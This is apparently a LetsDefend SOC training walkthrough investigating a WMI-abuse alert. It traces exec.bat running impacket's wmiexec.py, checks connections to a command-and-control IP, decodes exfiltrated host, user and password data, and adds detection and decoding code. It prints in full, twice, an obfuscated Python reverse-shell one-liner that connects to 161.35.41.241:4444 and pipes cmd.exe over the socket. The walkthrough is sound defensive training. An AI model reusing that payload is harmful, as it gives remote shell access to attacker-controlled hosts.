4ensiX

I noticed that for the one I had called FP, I selected FP but the display shows TP.

LetsDefend level 1 alert SOC134 - Suspicious WMI Activity event-id 71

Details

EventID: 71
Event Time: March 7, 2021, 4:50 p.m.
Rule: SOC134 - Suspicious WMI Activity
Level: Security Analyst
Source Address: 172.16.17.54
Source Hostname: Desktop-Anderson
File Name: exec.bat
File Hash: 50459310eded4c520ab5c9e3626a9300
File Size: 52.00 B
Device Action: Allowed
Download (Password:infected): 50459310eded4c520ab5c9e3626a9300.zip

Playbook

Define Threat Indicator

Answer: Other

Check if the malware is quarantined/cleaned

Endpoint Security

# Process History

AcroRd32.exe
MD5:357b03e0b8d0c30713f2c41ce60583c5
Path:c:/program files (x86)/adobe/acrobat reader dc/reader/acrord32.exe

Chrome.exe
MD5:E9CABAAACF0E50A55DF49698C0800D4B
Path:c:/program files (x86)/google/chrome/application/chrome.exe
Size:1.72 MB

ccsvchst.exe
MD5:aba0a9709e6c11bc0b6ee21de36743e3
Path:c:/program files (x86)/symantec/symantec endpoint protection/14/bin/ccsvchst.exe
Size:142.45 KB

notepad.exe
MD5:FC2EA5BD5307D2CFA5AAA38E0C0DDCE9
Size:216 KB
Path:c:/windows/system32/notepad.exe

iexplore.exe
MD5:b015ecd030da9a979e6d1a3d25f8fd8
Path:c:/program files/internet explorer/iexplore.exe

WmiPrvSE.exe
MD5:4fb491ac8d46aaf22ba8bc5c73dabef7
Path:C:/WINDOWS/System32/Wbem
Child Process:cmd.exe /Q /K C:/Python27/python.exe -c '(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('161.35.41.241', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['//windows//system32//cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in 
[(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))' /list 1> //127.0.0.1/ADMIN$/test.dat 2>&1

outlook.exe
MD5:BFE93F50474FDB27D70C47326C8B6051
Path:c:/program files (x86)/microsoft office/office15/outlook.exe
Size:18.11 MB
Start Time:2020-12-10 12:29

vmware-usbarbitrator64.exe
MD5:59C8BF1A8C9CBB6EC136DC7F7476250D
Path:c:/program files (x86)/common files/vmware/usb/vmware-usbarbitrator64.exe
Size:907.92 KB
Start Time:2020-09-22 09:10

services.exe
Path:c:/users/Anderson/desktop/services.exe
Size:2 MB
String1:go.buildid
String2:Go build ID:
String3:json:"pid"
String4:json:"key"
String5:json:"agent_time"
String6:json:"rid"
String7:json:"ports"
String8:json:"agent_platform"
String9:rat.New

The child process of WmiPrvSE.exe looks highly suspicious.

161.35.41.241

VirusTotal: https://www.virustotal.com/gui/ip-address/161.35.41.241
AbuseIPDB: https://www.abuseipdb.com/check/161.35.41.241
ip-sc: https://ip-sc.net/ja/r/161.35.41.241
The IP belongs to a DigitalOcean server.

Answer: Not Quarantined

Analyze Malware

First, check exec.bat, the file the alert detected in the first place.

$ cat exec.bat 
python wmiexec.py LetsDefend/Administrator@127.0.0.1

The WmiPrvSE.exe child process seen earlier was presumably spawned by exec.bat, but exec.bat alone does not show what happened.
wmiexec.py may well be this one:
impacket/wmiexec.py at master · SecureAuthCorp/impacket · GitHub
It appears to produce something similar to the WmiPrvSE.exe child process:

cmd.exe /Q /K C:/Python27/python.exe -c '(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('161.35.41.241', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['//windows//system32//cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in 
[(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))' /list 1> //127.0.0.1/ADMIN$/test.dat 2>&1

These appear to execute commands through WMI.
Next, check the logs for connections to 161.35.41.241.

Connection to 161.35.41.241

| # | Date | Type | Source Address | Source Port | Destination Address | Destination Port |
|---|---|---|---|---|---|---|
| 315 | Dec 19, 2020, 08:28 AM | Proxy | 172.16.17.54 | 14452 | 161.35.41.241 | 4444 |
| 316 | Dec 19, 2020, 03:18 PM | Proxy | 172.16.17.54 | 21332 | 161.35.41.241 | 4444 |
| 317 | Dec 19, 2020, 03:21 PM | Proxy | 172.16.17.54 | 23551 | 161.35.41.241 | 4444 |
| 318 | Dec 19, 2020, 03:21 PM | Proxy | 172.16.17.54 | 25221 | 161.35.41.241 | 4444 |

315

content: aqlKZ7wjzg0iKM00E1WB/jq9_RA46w91EKl9A02Dv/nbNdZiLsB1ci8Ph0fb64/9Ks1YxAE86iz9A0dUiDl

316

data: hostname:DESKTOP-ANDERSON

base64: aG9zdG5hbWU6REVTS1RPUC1BTkRFUlNPTg== -> hostname:DESKTOP-ANDERSON

317

data: dXNlcnM6ClVzZXIgYWNjb3VudHMgZm9yIFxcREVTS1RPUC1BTkRFUlNPTgoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgRGVmYXVsdEFjY291bnQgICAgICAgICAgIEd1ZXN0CkFuZGVyc29uICAgICAgICAgICAgICAgICAgICAKVGhlIGNvbW1hbmQgY29tcGxldGVkIHN1Y2Nlc3NmdWxseS4=

base64 decode ->

users:
User accounts for \\DESKTOP-ANDERSON

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
Anderson                    
The command completed successfully.

318

data: UGFzc2xpc3Q6CgpBbmRlcnNvbjphbmRlcjEyc29uIQpBZG1pbmlzdHJhdG9yOm15czNyM3RQQHNzIS4=

base64 decode ->

Passlist:

Anderson:ander12son!
Administrator:mys3r3tP@ss!.

It appears the attacker obtained the Administrator's credentials by executing commands through WMI.
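As an added example that is not part of the original post, the decoding step above done programmatically: the proxy-log fields of records 315 to 318 are decoded strictly and labelled by what they disclose, and the non-base64 content of record 315 is reported as undecodable rather than guessed at. The record ids and dict layout are constructed for this example.

```python
import base64
import binascii
import re

# Constructed sample: the base64 "data"/"content" fields of proxy log records
# 315-318 from this investigation, keyed by log id.
SAMPLE_RECORDS = {
    315: "aqlKZ7wjzg0iKM00E1WB/jq9_RA46w91EKl9A02Dv/nbNdZiLsB1ci8Ph0fb64/9Ks1YxAE86iz9A0dUiDl",
    316: "aG9zdG5hbWU6REVTS1RPUC1BTkRFUlNPTg==",
    317: "dXNlcnM6ClVzZXIgYWNjb3VudHMgZm9yIFxcREVTS1RPUC1BTkRFUlNPTgoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgRGVmYXVsdEFjY291bnQgICAgICAgICAgIEd1ZXN0CkFuZGVyc29uICAgICAgICAgICAgICAgICAgICAKVGhlIGNvbW1hbmQgY29tcGxldGVkIHN1Y2Nlc3NmdWxseS4=",
    318: "UGFzc2xpc3Q6CgpBbmRlcnNvbjphbmRlcjEyc29uIQpBZG1pbmlzdHJhdG9yOm15czNyM3RQQHNzIS4=",
}

CRED_LINE = re.compile(r"^[A-Za-z0-9._-]+:\S+$")  # "user:password" style lines

def decode_field(value: str):
    """Strict base64 decode; returns None when the field is not valid base64 text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def classify(text: str) -> str:
    """Label what the decoded payload discloses about the victim host."""
    first = next((ln.strip() for ln in text.splitlines() if ln.strip()), "")
    if first.lower().startswith("passlist"):
        return "credentials"
    if "User accounts for" in text:
        return "account-enumeration"
    if first.lower().startswith("hostname:"):
        return "host-identification"
    return "unknown"

def triage(records: dict) -> dict:
    """Decode each record; returns {id: (category, decoded text or None, credential line count)}."""
    result = {}
    for rid, value in sorted(records.items()):
        text = decode_field(value)
        if text is None:
            result[rid] = ("undecodable", None, 0)  # record 315: '_' is not a base64 character
            continue
        category = classify(text)
        creds = [ln for ln in text.splitlines() if CRED_LINE.match(ln.strip())] \
            if category == "credentials" else []
        result[rid] = (category, text, len(creds))
    return result

if __name__ == "__main__":
    for rid, (category, _text, n_creds) in triage(SAMPLE_RECORDS).items():
        print(f"{rid}: {category} (credential lines: {n_creds})")
```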

Answer: Malicious

By the way, if you come across suspicious Python code, is there no free service for dynamically analysing it?

Aside

Is this the standard pattern when WMI is abused?

cmd.exe /Q /c hostname 1> \\127.0.0.1\ADMIN$\output.txt 2>&1
MITRE ATT&CK® Technique: Windows Admin Shares - Red Canary
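As an added example, not code from the original post, a small detection routine for the two behaviours seen in this investigation: the wmiexec.py-style `cmd.exe /Q /c ... 1> \\127.0.0.1\ADMIN$\... 2>&1` pattern under WmiPrvSE.exe, and an inline Python command line that connects to a literal IP:port. The event fields and ids are constructed; the second command line is an abbreviated copy of the one-liner shown earlier.

```python
import re

# Signatures for the two behaviours seen in this walkthrough.
WMIEXEC_REDIRECT = re.compile(r"1>\s*[\\/]{2}127\.0\.0\.1[\\/]ADMIN\$[\\/]\S+", re.I)
CMD_QUIET = re.compile(r"\bcmd(?:\.exe)?\s+/Q\s+/[cK]\b", re.I)
INLINE_PY = re.compile(r"python[\d.]*(?:\.exe)?\s+-c\s", re.I)
SOCKET_CONNECT = re.compile(r"connect\(\(\s*'(\d{1,3}(?:\.\d{1,3}){3})',\s*(\d{1,5})\s*\)\)")

# Constructed sample events (Sysmon EventID 1 style); the ids are made up for this example.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /Q /c hostname 1> \\127.0.0.1\ADMIN$\output.txt 2>&1"},
    {"id": 2, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     # Abbreviated copy of the one-liner seen above; the lambda body is elided.
     "command_line": "cmd.exe /Q /K C:/Python27/python.exe -c '(lambda __y, __g, __contextlib: "
                     "[s.connect(('161.35.41.241', 4444)) ...])' /list 1> //127.0.0.1/ADMIN$/test.dat 2>&1"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": r"cmd.exe /c dir C:\Users"},
    {"id": 4, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe -k netsvcs"},
]

def image_name(path: str) -> str:
    """Last path component, lower-cased; handles both slash styles."""
    return re.split(r"[\\/]", path)[-1].lower()

def analyze_event(ev: dict) -> dict:
    """Tag one process-creation event and pull out any hard-coded remote endpoint."""
    parent, child, cmd = image_name(ev["parent_image"]), image_name(ev["image"]), ev["command_line"]
    tags, remote = [], None
    # wmiexec.py style: WmiPrvSE.exe -> cmd.exe /Q /c|/K ... 1> \\127.0.0.1\ADMIN$\<file> 2>&1
    if parent == "wmiprvse.exe" and child == "cmd.exe" \
            and CMD_QUIET.search(cmd) and WMIEXEC_REDIRECT.search(cmd):
        tags.append("wmiexec-style-remote-command")
    # Inline interpreter code that opens a TCP connection to a literal IP:port.
    m = SOCKET_CONNECT.search(cmd)
    if INLINE_PY.search(cmd) and m:
        tags.append("inline-python-reverse-connection")
        remote = (m.group(1), int(m.group(2)))
    return {"tags": tags, "remote": remote}

def scan(events: list) -> dict:
    """Run every event through analyze_event; returns {event id: result}."""
    return {ev["id"]: analyze_event(ev) for ev in events}

if __name__ == "__main__":
    for eid, res in scan(SAMPLE_EVENTS).items():
        if res["tags"]:
            print(eid, res["tags"], res["remote"])
```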

Check If Someone Requested the C2

Connections to 161.35.41.241 have been confirmed.
Answer: Accessed

Containment

Containment!

Add Artifacts

| Value | Type | Comment |
|---|---|---|
| 50459310eded4c520ab5c9e3626a9300 | MD5 Hash | exec.bat |
| 71d692995088527e4005dd4a64cf1028 | MD5 Hash | wmiexec.py example from SecureAuthCorp/impacket/master/examples/wmiexec.py |
| 161.35.41.241 | IP Address | RCE from this server |

End

close alert event-id 71